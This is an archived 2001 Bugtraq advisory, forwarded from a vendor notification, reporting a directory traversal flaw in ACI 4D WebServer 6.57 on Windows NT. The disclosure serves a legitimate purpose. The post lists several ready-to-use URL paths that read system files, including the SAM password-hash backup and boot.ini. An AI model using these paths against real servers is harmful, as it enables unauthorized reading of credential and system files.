ACI 4D WebServer Directory traversal.
From: KRFinisterre@checkfree.comDate: 08/20/01
- Previous message: David LeBlanc: "RE: HTML email "bug", of sorts."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Subject: ACI 4D WebServer Directory traversal. To: bugtraq@security-focus.com Message-ID: <OF7F14F084.50BEED60-ON85256AAE.00511CCC@ckfr.com> From: KRFinisterre@checkfree.com Date: Mon, 20 Aug 2001 10:51:00 -0400
----- Forwarded by Kevin R Finisterre/OH/CheckFree on 08/20/2001 10:43 AM
-----
KF <dotslash@snosoft.com>
Sent by: To: sales@4D.com, recon@snosoft.com
elguapo@clmboh1-smtp3.colum cc:
bus.rr.com Subject: I have found a security hole in your product...
08/18/2001 09:39 PM
vendor: http://www.4d.com/
current version: 6.7
tested version: 6.57 , others?
This directory transversal hole seems to work on
ACI 4d webserver running on the NT platform. I would imagine
exploitation on a macos box would be similar but would require
the proper mac filesystem path to the file you wish to view.
Server: ACI-4D/6.57
http://host + one of the following urls.
/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
-KF
- Previous message: David LeBlanc: "RE: HTML email "bug", of sorts."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
